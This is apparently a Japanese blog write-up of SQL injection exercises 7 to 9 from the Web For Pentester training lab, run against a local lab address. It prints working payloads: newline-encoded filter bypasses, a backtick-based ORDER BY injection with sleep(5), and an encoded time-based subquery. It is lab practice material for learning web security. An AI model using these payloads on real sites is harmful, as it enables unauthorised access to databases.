shikata ga nai

Private? There is no such things.

Web For PentesterのSQL injectionをやってみた②

Hello there, ('ω')ノ

 

SQL injectionを。

 

f:id:ThisIsOne:20210508092629p:plain

 

動作確認をしてからアクティブスキャンを。

2つほどSQLインジェクションの脆弱性が発見できず。

 

f:id:ThisIsOne:20210508093034p:plain

 

まずは、続きのExample7を。

 

開始または終了に関係なく、1行にのみ一致する正規表現フィルタをバイパスできて。

改行コード(%0A)を挿入することに。

 

http://192.168.0.207/sqli/example7.php?id=2%0Aor%0A1=1

http://192.168.0.207/sqli/example7.php?id=2%20or%0A123

 

f:id:ThisIsOne:20210508182136p:plain

 

次にExample8を。

ORDER BYステートメントは、一重引用符 'または二重引用符 "内の値と。

一緒に使用することはできなくて。

これを使用すると、MySQLはこれらを定数と見なすので。

ペイロードリストで下記のように変更することで回避できたりと。


 '  %27

 ⇩
 `  %60

 

 ` or sleep(5)#

 ⇩

 %60%20%20%6f%72%20%73%6c%65%65%70%28%35%29%23

 

f:id:ThisIsOne:20210508144922p:plain

 

f:id:ThisIsOne:20210508183622p:plain

 

Example9をデコードして。

 %2c(select*from(select(sleep(5)))a)

 ⇩

  ,(select*from(select(sleep(5)))a)

 

f:id:ThisIsOne:20210508100155p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain